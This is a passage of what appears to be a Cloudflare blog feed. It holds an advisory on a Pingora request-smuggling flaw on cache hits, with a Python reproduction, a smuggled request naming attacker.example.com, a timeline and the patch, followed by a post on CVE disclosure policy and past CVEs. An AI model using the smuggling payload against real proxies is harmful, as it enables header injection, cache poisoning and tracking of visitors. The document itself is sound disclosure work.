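        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            raise ValueError("incomplete request head")
        head = stream[pos:head_end]

        # Look for a Content-Length header (case-insensitive name).
        body_len = 0
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                body_len = int(value.strip())

        body_start = head_end + 4
        body_end = body_start + body_len
        if body_end > len(stream):
            raise ValueError("incomplete request body")
        requests.append((head, stream[body_start:body_end]))

        # The next request begins exactly where this body ends.
        pos = body_end
    return requests
```

The key point is the last assignment: the declared body length, not the content of the body, decides where the next request starts.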

Pingora generally handles requests on HTTP/1.1 connections in an RFC-compliant manner, either ensuring the downstream request body is properly consumed or declining to reuse the connection if it encounters an error. After the bug was filed, we discovered that when caching was enabled, this logic was skipped on cache hits (i.e. when the service’s cache backend can serve the response without making an additional upstream request).

This meant on a cache hit request, after the response was sent downstream, any unread request body left in the HTTP/1.1 connection could act as a vector for request smuggling. When formed into a valid (but incomplete) header, the request body could “poison” the subsequent request. The following example is a spec-compliant HTTP/1.1 request which exhibits this behavior:

GET /attack/foo.jpg HTTP/1.1

Host: example.com

<other headers…>

content-length: 79

GET / HTTP/1.1

Host: attacker.example.com

Bogus: foo

Let’s say there is a different request to victim.example.com that will be sent after this one on the reused HTTP/1.1 connection to a Pingora reverse proxy. The bug means that a Pingora service may not respect the Content-Length header and instead misinterpret the smuggled request as the beginning of the next request:

GET /attack/foo.jpg HTTP/1.1

Host: example.com

<other headers…>

content-length: 79

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request

Host: attacker.example.com

Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start

Host: victim.example.com

<other headers…>

Thus, the smuggled request could inject headers and its URL into a subsequent valid request sent on the same connection to a Pingora reverse proxy service.
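The effect can be reproduced with a toy model of a proxy reading requests off one reused connection. This is only a sketch under stated assumptions: every request is treated as a cache hit, the helper names and the `drain_on_cache_hit` flag are hypothetical, and the Content-Length is computed from the sketch's own body rather than copied from the example. It is not Pingora's code.

```python
def read_head(buf: bytes) -> tuple[list[bytes], bytes]:
    """Return (head lines, remaining bytes) for the next request in buf."""
    head, _, rest = buf.partition(b"\r\n\r\n")
    return head.split(b"\r\n"), rest


def content_length(lines: list[bytes]) -> int:
    """Declared body length of a request, or 0 if no Content-Length."""
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            return int(value.strip())
    return 0


def serve_connection(buf: bytes, drain_on_cache_hit: bool) -> list[list[bytes]]:
    """Parse every request on one connection, treating each as a cache hit."""
    seen = []
    while buf:
        lines, buf = read_head(buf)
        seen.append(lines)
        if drain_on_cache_hit:
            # Correct behavior: consume the declared body before reuse.
            buf = buf[content_length(lines):]
        # Otherwise the unread body stays in the buffer and is parsed
        # as the start of the next request.
    return seen


SMUGGLED = b"GET / HTTP/1.1\r\nHost: attacker.example.com\r\nBogus: foo"
ATTACK = (
    b"GET /attack/foo.jpg HTTP/1.1\r\nHost: example.com\r\n"
    b"Content-Length: " + str(len(SMUGGLED)).encode() + b"\r\n\r\n" + SMUGGLED
)
VICTIM = b"GET /victim/main.css HTTP/1.1\r\nHost: victim.example.com\r\n\r\n"

vulnerable = serve_connection(ATTACK + VICTIM, drain_on_cache_hit=False)
patched = serve_connection(ATTACK + VICTIM, drain_on_cache_hit=True)
```

In the `vulnerable` run the second parsed request starts with the attacker's request line, and the victim's request line ends up as the value of the `Bogus` header. In the `patched` run the second request is the victim's own.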

On April 11, 2025, Cloudflare was in the process of rolling out a Pingora proxy component with caching support enabled to a subset of CDN free plan traffic. This component was vulnerable to this request smuggling attack, which could enable modifying request headers and/or URL sent to customer origins.

As previously noted, the security researcher reported that they were also able to cause visitors to Cloudflare sites to make subsequent requests to their own malicious origin and observe which site URLs the visitor was originally attempting to access. During our investigation, Cloudflare found that certain origin servers would be susceptible to this secondary attack effect. The smuggled request in the example above would be sent to the correct origin IP address per customer configuration, but some origin servers would respond to the rewritten attacker Host header with a 301 redirect. Continuing from the prior example:

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request

Host: attacker.example.com

Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start

Host: victim.example.com

<other headers…>

HTTP/1.1 301 Moved Permanently // <- susceptible victim origin response

Location: https://attacker.example.com/

<other headers…>

When the client browser followed the redirect, it would trigger this attack by sending a request to the attacker hostname, along with a Referer header indicating which URL was originally visited, making it possible to load a malicious asset and observe what traffic a visitor was trying to access.

GET / HTTP/1.1 // <- redirect-following request

Host: attacker.example.com

Referer: https://victim.example.com/victim/main.css

<other headers…>

Upon verifying the Pingora proxy component was susceptible, the team immediately disabled CDN traffic to the vulnerable component on 2025-04-12 06:44 UTC to stop possible exploitation. By 2025-04-19 01:56 UTC, and prior to re-enablement of any traffic to the vulnerable component, a patch for the component was released, and any assets cached on the component’s backend were invalidated in case of possible cache poisoning as a result of the injected headers.

If you are using the caching functionality in the Pingora framework, you should update to version 0.5.0 or later. If you are a Cloudflare customer with a free plan, you do not need to do anything, as we have already applied the patch for this vulnerability.

All timestamps are in UTC.

2025-04-11 09:20 – Cloudflare is notified of a CDN request smuggling vulnerability via the Bug Bounty Program.

2025-04-11 17:16 to 2025-04-12 03:28 – Cloudflare confirms the vulnerability is reproducible and investigates which component(s) require changes to mitigate it.

2025-04-12 04:25 – Cloudflare isolates the issue to the rollout of a Pingora proxy component with caching enabled and prepares a release to disable traffic to this component.

2025-04-12 06:44 – Rollout to disable traffic complete, vulnerability mitigated.

We would like to sincerely thank James Kettle & Wannes Verwimp, who responsibly disclosed this issue via our Cloudflare Bug Bounty Program, allowing us to identify and mitigate the vulnerability. We welcome further submissions from our community of researchers to continually improve the security of all of our products and open source projects.

Whether you are a customer of Cloudflare or just a user of our Pingora framework, or both, we know that the trust you place in us is critical to how you connect your properties to the rest of the Internet. Security is a core part of that trust and for that reason we treat these kinds of reports and the actions that follow with serious urgency. We are confident about this patch and the additional safeguards that have been implemented, but we know that these kinds of issues can be concerning. Thank you for your continued trust in our platform. We remain committed to building with security as our top priority and responding swiftly and transparently whenever issues arise.

]]>By signing this pledge, Cloudflare joins a growing coalition of companies committed to strengthening the resilience of the digital ecosystem. This isn’t just symbolic; it's a concrete step in aligning with cybersecurity best practices and our commitment to protect our customers, partners, and data.

A central goal in CISA’s Secure by Design pledge is promoting transparency in vulnerability reporting. This initiative underscores the importance of proactive security practices and emphasizes transparency in vulnerability management, values that are deeply embedded in Cloudflare’s Product Security program. We believe that openness around vulnerabilities is foundational to earning and maintaining the trust of our customers, partners, and the broader security community.

Transparency in vulnerability reporting is essential for building trust between companies and customers. In 2008, Linus Torvalds noted that disclosure is inherently tied to resolution: “So as far as I'm concerned, disclosing is the fixing of the bug,” emphasizing that resolution must start with visibility. While this mindset might apply well to open-source projects and communities familiar with code and patches, it doesn’t scale easily to non-expert users and enterprise users who require structured, validated, and clearly communicated disclosures regarding a vulnerability’s impact. Today’s threat landscape demands not only rapid remediation of vulnerabilities but also clear disclosure of their nature, impact and resolution. This builds trust with the customer and contributes to the broader collective understanding of common vulnerability classes and emerging systemic flaws.

Common Vulnerabilities and Exposures (CVE) is a catalog of publicly disclosed vulnerabilities and exposures. Each CVE includes a unique identifier, summary, associated metadata like the Common Weakness Enumeration (CWE) and Common Platform Enumeration (CPE), and a severity score that can range from None to Critical.

The format of a CVE ID consists of a fixed prefix, the year of the disclosure and an arbitrary sequence number, like CVE-2017-0144. Memorable names such as "EternalBlue" (CVE-2017-0144) are often associated with high-profile exploits to enhance recall.
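As an illustration of that format, the following sketch validates and splits a CVE ID. It assumes the current CVE ID syntax of a four-digit year followed by a sequence number of four or more digits; the names `CVE_ID` and `parse_cve_id` are hypothetical.

```python
import re

# Assumed syntax: "CVE-", a four-digit year, "-", then 4 or more digits.
CVE_ID = re.compile(r"CVE-(\d{4})-(\d{4,})")


def parse_cve_id(text: str) -> tuple[int, str]:
    """Return (year, sequence) for a well-formed CVE ID, else raise."""
    match = CVE_ID.fullmatch(text)
    if match is None:
        raise ValueError(f"not a CVE ID: {text!r}")
    # The sequence is kept as a string so leading zeros survive.
    return int(match.group(1)), match.group(2)
```

For example, `parse_cve_id("CVE-2017-0144")` yields the year 2017 and the sequence `"0144"`.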

As an authorized CVE Numbering Authority (CNA), Cloudflare can assign CVE identifiers for vulnerabilities discovered within our products and ecosystems. Cloudflare has been actively involved with MITRE's CVE program since Cloudflare's founding in 2009. As a CNA, Cloudflare assumes the responsibility to manage disclosure timelines, ensuring they are accurate, complete, and valuable to the broader industry.

Cloudflare issues CVEs for vulnerabilities discovered internally and through our Bug Bounty program when they affect open source software and/or our distributed closed source products.

The findings are triaged based on real-world exploitability and impact. Vulnerabilities without a plausible exploitation path, in addition to findings related to test repositories or exposed credentials like API keys, typically do not qualify for CVE issuance.

We recognize that CVE issuance involves nuance, particularly for sophisticated security issues in a complex codebase (for example, the Linux kernel). Issuance relies on impact to users and the likelihood of the exploit, which depends on the complexity of executing an attack. The growing number of CVEs issued industry-wide reflects a broader effort to balance theoretical vulnerabilities against real-world risk.

In scenarios where Cloudflare was impacted by a vulnerability, but the root cause was within another CNA’s scope of products, Cloudflare will not assign the CVE. Instead, Cloudflare may choose other mediums of disclosure, like blog posts.

Our disclosure process begins with internal evaluation of severity and scope, and any potential privacy or compliance impacts. When necessary, we engage our Legal and Security Incident Response Teams (SIRT). For vulnerabilities reported to Cloudflare by external entities via our Bug Bounty program, our standard disclosure timeline is within 90 days. This timeline allows us to ensure proper remediation, thorough testing, and responsible coordination with affected parties. While we are committed to transparent disclosure, we believe addressing and validating fixes before public release is essential to protect users and uphold system security. For open source projects, we also issue security advisories on the relevant GitHub repositories. Additionally, we encourage external researchers to publish or blog about their findings after issues are remediated. Full details of Cloudflare’s disclosure policy and process for external researchers and entities can be found on our Bug Bounty program policy page.

To date, Cloudflare has issued and disclosed multiple CVEs. Because of the security platforms and products that Cloudflare builds, vulnerabilities have primarily been in the areas of denial of service, local privilege escalation, logical flaws, and improper input validation. Cloudflare also believes in collaboration and open sources some of our software stack; CVEs in these repositories are therefore also promptly disclosed.

Cloudflare disclosures can be found here. Below are some of the most notable vulnerabilities disclosed by Cloudflare:

CVE-2024-1765: quiche: Memory Exhaustion Attack using post-handshake CRYPTO frames

Cloudflare quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running a quiche server or client.

A remote attacker could take advantage of this vulnerability by repeatedly sending an unlimited number of 1-RTT CRYPTO frames after previously completing the QUIC handshake.

Exploitation was possible for the duration of the connection, which could be extended by the attacker.

quiche 0.19.2 and 0.20.1 are the earliest versions containing the fix for this issue.

CVE-2024-0212: Cloudflare WordPress plugin enables information disclosure of Cloudflare API (for low-privilege users)

The Cloudflare WordPress plugin was found to be vulnerable to improper authentication. The vulnerability enables attackers with a lower privileged account to access data from the Cloudflare API.

The issue has been fixed in version 4.12.3 and later of the plugin.

CVE-2023-2754: Plaintext transmission of DNS requests in Windows 1.1.1.1 WARP client